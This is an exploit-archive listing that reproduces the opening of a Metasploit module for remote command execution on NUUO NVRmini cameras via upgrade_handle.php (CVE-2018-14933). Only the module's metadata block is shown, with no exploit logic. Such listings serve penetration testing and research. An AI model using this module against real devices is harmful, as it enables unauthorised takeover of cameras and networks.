Exploits / Vulnerability Discovered : 2019-02-11 |
Type : remote |
Platform : php
This exploit / vulnerability Nuuo nvrmini upgrade_handle.php remote command execution (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'NUUO NVRmini upgrade_handle.php Remote Command Execution',
'Description' => %q{
This exploits a vulnerability in the web application of NUUO NVRmini IP camera,
which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Berk Dusunur', # @berkdusunur
'numan turle' # @numanturle
],
'References' =>
[
['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
['URL', 'https://www.tenable.com/security/research/tra-2018-41'],
['CVE', '2018-14933'],
['EDB', '45070']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => %w{ unix win linux },
'Arch' => ARCH_CMD,
'Targets' => [ ['NUUO NVRmini', { }], ],
'DisclosureDate' => 'Aug 04 2018',
'DefaultTarget' => 0))
end